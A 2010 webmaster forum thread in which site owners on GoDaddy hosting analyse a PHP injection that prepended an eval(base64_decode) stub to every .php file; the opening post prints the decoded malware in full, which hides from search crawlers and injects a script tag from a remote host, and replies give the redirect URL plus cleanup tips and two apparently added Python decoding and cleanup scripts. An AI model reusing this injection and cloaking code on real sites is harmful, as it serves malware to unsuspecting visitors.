One of my sites was hacked. I'm looking for help to find out the reason.

Discussion in 'PHP' started by BurritoWeed, Apr 21, 2010.

  1. #1
    Greetings.

    It seems a hacker got access to my server or FTP account and ran a script that put a piece of ENCODED PHP code at the beginning of all .php files on my server. I'm looking for help to interpret this code DECODED.

    The ENCODED PHP code is this one:
    
    <?php /**/ eval(base64_decode("..."));?>
    
    PHP:
    This code DECODED is this PHP script:

    
    // Runs once per request: the guard in $GLOBALS stops the stub from
    // installing itself twice when it is present in several included files.
    if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
        $GLOBALS['mr_no'] = 1;
        if (!function_exists('mrobh')) {
            if (!function_exists('gml')) {
                // Returns the injected tag, but only for visitors whose
                // User-Agent does not look like Googlebot or Yahoo, so the
                // injection is hidden from search-engine crawlers.
                function gml() {
                    if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                        // Decodes to: <script src="http://61.4.82.212/js.php"></script>
                        return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly82MS40LjgyLjIxMi9qcy5waHAiPjwvc2NyaXB0Pg==");
                    }
                    return "";
                }
            }
            // Polyfill for gzdecode() (absent before PHP 5.4) so the hook can
            // rewrite output even when the page was gzip-compressed: it walks
            // the gzip header flags (FEXTRA=4, FNAME=8, FCOMMENT=16, FHCRC=2)
            // to find where the deflate stream starts.
            if (!function_exists('gzdecode')) {
                function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {
                    $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
                    $RBE4C4D037E939226F65812885A53DAD9 = 10;
                    $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
                    if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4) {
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v', substr($R5A9CF1B497502ACA23C8F611A564684C, 10, 2));
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB = $R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                        $RBE4C4D037E939226F65812885A53DAD9 += 2 + $R63BEDE6B19266D4EFEAD07A4D91E29EB;
                    }
                    if ($R30B2AB8DC1496D06B230A71D8962AF5D & 8) {
                        $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                    }
                    if ($R30B2AB8DC1496D06B230A71D8962AF5D & 16) {
                        $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                    }
                    if ($R30B2AB8DC1496D06B230A71D8962AF5D & 2) {
                        $RBE4C4D037E939226F65812885A53DAD9 += 2;
                    }
                    $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C, $RBE4C4D037E939226F65812885A53DAD9));
                    if ($R034AE2AB94F99CC81B389A1822DA3353 === FALSE) {
                        // Not gzip after all: pass the buffer through unchanged.
                        $R034AE2AB94F99CC81B389A1822DA3353 = $R5A9CF1B497502ACA23C8F611A564684C;
                    }
                    return $R034AE2AB94F99CC81B389A1822DA3353;
                }
            }
            // Output-buffer callback: receives the whole rendered page and
            // inserts the tag from gml() just before </body> (or appends it
            // when the page has no </body>).
            function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
                Header('Content-Encoding: none');
                $RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
                if (preg_match('/\<\/body/si', $RA179ABD3A7B9E28C369F7B59C51B81DE)) {
                    return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $RA179ABD3A7B9E28C369F7B59C51B81DE);
                } else {
                    return $RA179ABD3A7B9E28C369F7B59C51B81DE . gml();
                }
            }
            ob_start('mrobh');
        }
    }
    
    PHP:
    Could someone expert in PHP and security please help me find out what this script does? What's the target of this DECODED PHP code?

    Thanks a lot for any help!!! :)
     
    BurritoWeed, Apr 21, 2010 IP
  2. digitalpoint

    digitalpoint Overlord of no one Staff

    Messages:
    38,263
    Likes Received:
    2,595
    Best Answers:
    460
    Trophy Points:
    710
    Digital Goods:
    29
    #2
    The biggest thing is does it insert this:

    <script src="http://61.4.82.212/js.php"></script>
    Code (markup):
    That ultimately redirects the user to here:

    http://www1.fastfullfind22p.xorg.pl?p=p52dcWpkbG6HjsbIo21wiXNe0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8%2FUoKebWqas0GrEYWiaj5qUlZZoYlzY1cStp6d2ZV6ldV%2FVltjSlm1TmpukyWqIppnLpKCKzKF0aWuTlJVnZGZvYmplbF%2FTksqjV6SgcWNqm16bYmCZYJSK16Rpb2eXmJRyZGRsZ2lam5yegreMqJmRcWpxnA%3D%3D
    Code (markup):
    Which is some crap that tries to trick users into installing something on their computer.
     
    digitalpoint, Apr 22, 2010 IP
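    As an added example (not code from the thread or from any of the posters), here is how to reach the same conclusion digitalpoint did without ever executing the stub: decode the `eval(base64_decode("..."))` argument statically, then decode the base64 strings the payload itself carries, which is where the `<script src=...>` tag is hidden. The sample infected file is constructed for the example; its inner payload is a cut-down stand-in for the decoded script above, but the nested base64 string is the one from the thread.

```python
import base64
import re

# The nested base64 string is the one from the decoded script in the thread;
# the PHP wrapped around it is a constructed, cut-down stand-in for the full
# decoded payload.
NESTED_B64 = "PHNjcmlwdCBzcmM9Imh0dHA6Ly82MS40LjgyLjIxMi9qcy5waHAiPjwvc2NyaXB0Pg=="
INNER_PAYLOAD = (
    'if(!function_exists("gml")){function gml(){'
    'return base64_decode("' + NESTED_B64 + '");}}'
    'ob_start("mrobh");'
)
# Constructed infected file: the one-line stub prepended to an otherwise
# clean page, in the exact shape the thread shows.
SAMPLE_PHP_FILE = (
    '<?php /**/ eval(base64_decode("'
    + base64.b64encode(INNER_PAYLOAD.encode()).decode()
    + '"));?>\n<?php\necho "legit page";\n'
)

# The stub as posted: optional /**/ filler, a single eval(base64_decode(...))
# call, nothing else inside the tag.
STUB_RE = re.compile(
    r'<\?php\s*(?:/\*\*/)?\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>'
)
NESTED_B64_RE = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
SCRIPT_SRC_RE = re.compile(r'<script\s+src=["\']([^"\']+)["\']', re.I)


def find_stub(source):
    """Return the base64 argument of an eval(base64_decode()) stub, or None."""
    m = STUB_RE.search(source)
    return m.group(1) if m else None


def decode_stub(source):
    """Statically unwrap the stub: decode its argument (never eval it), then
    decode every base64 literal inside the payload and pull script src URLs
    out of those, so the remote loader is visible without running anything."""
    payload = find_stub(source)
    if payload is None:
        return None
    decoded = base64.b64decode(payload).decode("latin-1")
    nested = [base64.b64decode(s).decode("latin-1")
              for s in NESTED_B64_RE.findall(decoded)]
    srcs = [u for text in nested for u in SCRIPT_SRC_RE.findall(text)]
    return {"decoded": decoded, "nested": nested, "script_srcs": srcs}


def served_page_scripts(html):
    """List external script sources in a page as a visitor receives it, which
    is where the output-buffer hook adds its tag next to </body>. Compare
    this against the sources your own templates reference."""
    return SCRIPT_SRC_RE.findall(html)


if __name__ == "__main__":
    report = decode_stub(SAMPLE_PHP_FILE)
    print(report["decoded"])
    print(report["script_srcs"])
```

    The point of `decode_stub` is that the search-engine check in the payload means you may never see the tag when you fetch your own site with a crawler-like User-Agent; decoding the file tells you what it injects regardless of who asks.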
  3. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Really thanks for your help DigitalPoint.

    I already deleted this piece of code from all my .php files. It was only active for about 2 hours yesterday. I redirected my site with a 505 error and stopped search engines crawling with robots.txt while I deleted the code from all .php files.

    So, I shouldn't worry too much about the impact it could have had?

    Do you think the person who did this misdemeanor had access directly to my FTP account or probably it was caused by a Folder Permissions vulnerability?

    Thanks newly! :)

    By the way, that URL shows me a 404 Not Found.

    
    http://www1.fastfullfind22p.xorg.pl?p=p52dcWpkbG6HjsbIo21wiXNe0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8%2FUoKebWqas0GrEYWiaj5qUlZZoYlzY1cStp6d2ZV6ldV%2FVltjSlm1TmpukyWqIppnLpKCKzKF0aWuTlJVnZGZvYmplbF%2FTksqjV6SgcWNqm16bYmCZYJSK16Rpb2eXmJRyZGRsZ2lam5yegreMqJmRcWpxnA%3D%3D
    
    Code (markup):
     
    BurritoWeed, Apr 22, 2010 IP
  4. SEOibiza

    SEOibiza Peon

    Messages:
    1,198
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    0
    #4
    We had a couple of WP sites done with this same thing last night; all sites in that hosting package were done the same.

    Is your site on WP too? Wondering whether it's a plugin vulnerability or they don't care what type of site it was.

    Also, who is yours hosted with? They are on GoDaddy.
     
    SEOibiza, Apr 22, 2010 IP
  5. digitalpoint

    digitalpoint Overlord of no one Staff

    Messages:
    38,263
    Likes Received:
    2,595
    Best Answers:
    460
    Trophy Points:
    710
    Digital Goods:
    29
    #5
    Not sure where your vulnerability was... but if you are running WordPress, that's a good place to look.
     
    digitalpoint, Apr 22, 2010 IP
  6. kmofo

    kmofo Active Member

    Messages:
    442
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    85
    #6
    One of the reasons this happened might be that you have a trojan/virus on your pc. That trojan might have stolen your ftp user/pass(this scenario happens a lot lately and it's as probable as a server side vulnerability). To be sure, change your credentials using a different (clean) computer!
     
    kmofo, Apr 22, 2010 IP
  7. SEOibiza

    SEOibiza Peon

    Messages:
    1,198
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    0
    #7
    possible of course but seems unlikely given the security on the PCs here, and the fact that it's only one hosting package (hopefully, stays that way :) ) out of many many that get accessed from here.
     
    SEOibiza, Apr 22, 2010 IP
  8. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    Good Day SEOIbiza. My site is a webpage. No frameworks.
     
    BurritoWeed, Apr 22, 2010 IP
  9. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    I'm using GoDaddy. The weird thing is, this happened when I wasn't at home. I was one week without turning on the PC where I usually work.
     
    BurritoWeed, Apr 22, 2010 IP
  10. Zeokat

    Zeokat Member

    Messages:
    35
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    46
    #10
    Check server logs, FTP log, etc... that can help to find where the problem is.
    Anyway, the first move is to clean all PHP files and change all passwords (FTP, WordPress admin, etc...).

    Hope it helps.
     
    Zeokat, Apr 22, 2010 IP
  11. naphets66

    naphets66 Well-Known Member

    Messages:
    78
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    123
    #11
    It has to be an issue with GoDaddy. I have been round and round. I have found Wordpress blogs, phpBB forums and Pligg installations with the infection. The only common denominator so far is GoDaddy. Is your IP 97.74.215.82 or anything close?
    Mine got hit last week and then again this week.
    More info:
    http://community.godaddy.com/groups/go-daddy-customers/forum/topic/malware-infection/
    http://www.quatloos.com/Q-Forum/viewtopic.php?f=20&p=92769
    http://forums.pligg.com/questions-comments/21128-new-pligg-virus.html
     
    naphets66, Apr 22, 2010 IP
  12. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #12
    Thanks everybody for all your help!!! Well.. this seems to be a GoDaddy problem, I somewhat agree. They are my hosting provider. I contacted them and this is their answer:

    Naphets my ip isn't close to that one.. it is 68.178.2..

    I noticed that this malware script left some files and folders with 777 permissions.. making them vulnerable again.. I changed all folders to 754 and files to 654 and my FTP password to 14 characters with symbols, numbers, capital letters, etc.... I hope this helps to avoid this attack again.

    If someone has more info about this or any contribution I will appreciate it! Thanks newly!
     
    BurritoWeed, Apr 22, 2010 IP
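    Two pieces of advice in this thread, Zeokat's "clean all php files" (#10) and the 777 folders BurritoWeed found left behind (#12), can be done in one pass. The script below is an added example, not code from the thread or from any poster: it strips the leading stub from every `.php` file under a directory, lists everything that is world-writable, and resets the modes. The sample tree it builds is constructed for the example; the stub in it is a constructed one whose argument just decodes to `if(1){}`. Defaults of 755/644 are assumed for the hardened modes (BurritoWeed used 754/654; pass those in if your host needs them).

```python
import os
import re
import stat
import tempfile

# Stub at the very start of a file, as the thread describes. Only the leading
# occurrence is removed so the legitimate code after it is kept intact.
LEADING_STUB_RE = re.compile(
    r'\A\s*<\?php\s*(?:/\*\*/)?\s*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\s*\?>[ \t]*\r?\n?'
)

# Constructed stub for the sample tree; its argument decodes to "if(1){}".
SAMPLE_STUB = '<?php /**/ eval(base64_decode("aWYoMSl7fQ=="));?>\n'


def strip_stub(source):
    """Return (cleaned_source, changed)."""
    cleaned, n = LEADING_STUB_RE.subn("", source, count=1)
    return cleaned, n == 1


def clean_tree(root):
    """Strip the stub from every .php file under root; return the paths cleaned."""
    cleaned_paths = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                src = fh.read()
            new_src, changed = strip_stub(src)
            if changed:
                with open(path, "w", encoding="latin-1") as fh:
                    fh.write(new_src)
                cleaned_paths.append(path)
    return sorted(cleaned_paths)


def world_writable(root):
    """Paths under root whose mode grants write to 'other' (777, 666, ...)."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def harden_modes(root, dir_mode=0o755, file_mode=0o644):
    """Reset every directory and file under root to the given modes."""
    for dirpath, dirs, files in os.walk(root):
        for name in dirs:
            os.chmod(os.path.join(dirpath, name), dir_mode)
        for name in files:
            os.chmod(os.path.join(dirpath, name), file_mode)


def build_sample_tree(root):
    """Constructed sample: two infected files, one clean file, a 777 directory
    and a 666 file, with modes set explicitly so the umask does not matter."""
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(SAMPLE_STUB + '<?php\necho "hello";\n')
    with open(os.path.join(root, "about.php"), "w") as fh:
        fh.write('<?php\necho "about";\n')
    with open(os.path.join(root, "uploads", "cache.php"), "w") as fh:
        fh.write(SAMPLE_STUB + '<?php\n// cached\n')
    os.chmod(os.path.join(root, "index.php"), 0o644)
    os.chmod(os.path.join(root, "about.php"), 0o644)
    os.chmod(os.path.join(root, "uploads"), 0o777)
    os.chmod(os.path.join(root, "uploads", "cache.php"), 0o666)


def demo():
    """Run the whole triage on a throwaway tree and return what happened."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)

    def rel(paths):
        return [os.path.relpath(p, root) for p in paths]

    before = rel(world_writable(root))
    cleaned = rel(clean_tree(root))
    with open(os.path.join(root, "index.php"), encoding="latin-1") as fh:
        index_after = fh.read()
    harden_modes(root)
    after = rel(world_writable(root))
    return {"world_writable_before": before, "cleaned": cleaned,
            "index_after": index_after, "world_writable_after": after}


if __name__ == "__main__":
    print(demo())
```

    Cleaning files only removes the injected hook; it does not tell you how the files were written, so keep the `world_writable` output and the FTP/HTTP logs Zeokat mentions from before the cleanup, and change the FTP password from a machine you trust, as kmofo suggested.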
  13. BurritoWeed

    BurritoWeed Peon

    Messages:
    7
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #13
    By the way, I read somewhere "do not leave your FTP password in your FTP program, for example FireFTP and others..".. I think it could help to avoid attacks!
     
    BurritoWeed, Apr 22, 2010 IP
  14. lukeg32

    lukeg32 Peon

    Messages:
    645
    Likes Received:
    19
    Best Answers:
    1
    Trophy Points:
    0
    #14
    Any software with any credibility would not store it as plain text.... but what does it matter;

    a) if you had to type it in; keyloggers
    b) FTP sends your details as plain text (username & password) anyway
     
    lukeg32, Apr 22, 2010 IP
  15. stalecache

    stalecache Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    I also discovered one of my sites infected with this. Site is wordpress running on godaddy shared hosting too.

    I 'warded' it off for now by replacing the "</body>" with "<script>document.write("<"+"/"+"bo"+""+"dy"+">");</script>".
     
    stalecache, Apr 22, 2010 IP
  16. SEOibiza

    SEOibiza Peon

    Messages:
    1,198
    Likes Received:
    43
    Best Answers:
    0
    Trophy Points:
    0
    #16
    lol, I got the standard "fob off" letter too, "it's nothing to do with us" type of thing.. wankers.

    I'm sure it's a GoDaddy issue too. Because of the variety of different sites it's not a WP plugin vulnerability, and GoDaddy are the only host affected.
     
    SEOibiza, Apr 23, 2010 IP
  17. alistair80

    alistair80 Well-Known Member

    Messages:
    1,868
    Likes Received:
    59
    Best Answers:
    0
    Trophy Points:
    185
    #17
    Has anyone been able to fix this js on footer issue on WP? This seems to be a massive attack ...a Chinese hacking script for WP...but if you have other sites in the same server as you WP blog, it infects them too...
     
    alistair80, Apr 24, 2010 IP
  18. Kairos

    Kairos Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #18
    Just got infected today. I've a Drupal site hosted at GoDaddy and discovered the problem this morning. I checked my files, and found that all .php files had the "eval(base64_decode" line at the beginning.

    I simply resent all the files by FTP and site went back to normal, although it does not solve the problem, as I still don't know how the files were changed and what kind of exploit was used.
     
    Kairos, Apr 28, 2010 IP
  19. Kairos

    Kairos Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #19
    Definitely a GoDaddy problem. My Drupal site is hosted at address 72.167.131.105 (p3slh172.shr.phx3.secureserver.net) and was hit this morning.

    I reviewed the HTTP logs from 22 to 28/04 and there is no trace of any attack. But being on a shared hosting plan, I can't have access to the server logs.
     
    Kairos, Apr 28, 2010 IP
  20. alistair80

    alistair80 Well-Known Member

    Messages:
    1,868
    Likes Received:
    59
    Best Answers:
    0
    Trophy Points:
    185
    #20
    It's a GoDaddy issue! I am glad I cancelled my hosting with 'em... The worst part is that they don't / won't do anything about it, nor do they have a security team that deals with this type of issue, unlike Gator. I'd suggest you SCAN your PC with Panda Internet Security... probably the ONLY antivirus that'd be able to track that spyware in your system. Get the free evaluation version (if you don't want to spend on that purchase right away) and scan your PC to begin with, and then change all your passwords // usernames from another secured PC. Only then can you worry about fixing the issue. It'd require a mass cleanup... and do take a look at the files that aren't necessarily PHP... Something triggers that infection!

    It's a WP hack script from China...but looks like it affects other cms too. I know some guys who can fix the issue in case you're lost!
     
    alistair80, Apr 28, 2010 IP